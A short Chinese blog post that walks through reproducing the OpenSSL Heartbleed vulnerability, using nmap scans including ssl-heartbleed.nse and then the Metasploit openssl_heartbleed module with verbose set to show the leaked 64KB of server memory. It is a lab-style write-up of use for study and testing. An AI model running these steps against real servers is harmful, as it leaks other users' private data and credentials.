openssl心脏滴血漏洞
Published in:2022-05-25 |

openssl心脏滴血漏洞

心脏出血漏洞”是指openssl这个开源软件中的一个漏洞,因为该软件使用到一个叫做heartbeat(中文名称为心跳)的扩展,恰恰是这个扩展出现了问题,所以才将这个漏洞形象的称为“心脏出血”;

影响范围

OpenSSL 1.0.1版本

漏洞复现

nmap -O xxxxx 查看开放端口

nmap xxxx –script=vuln

nmap -sV -p 8443 –script ssl-heartbleed.nse xxxxxx

msf

1
2
3
4
search heartbleed

use uxiliary/scanner/ssl/openssl_heartbleed

1
2
3
设置一下verbose,让verbose为true这样我们才可以看到泄露的64kb数据

set  verbose true

可以看到一些泄露的数据,假如这是被攻击端正在输入一些私密的数据,我们就有可能获取到这些数据了。

漏洞复现 openssl
Prev:
偶遇挖洞
Next:
wpscan学习使用

    • Copyright © 2022 - 2024 16778738 | Powered by “> |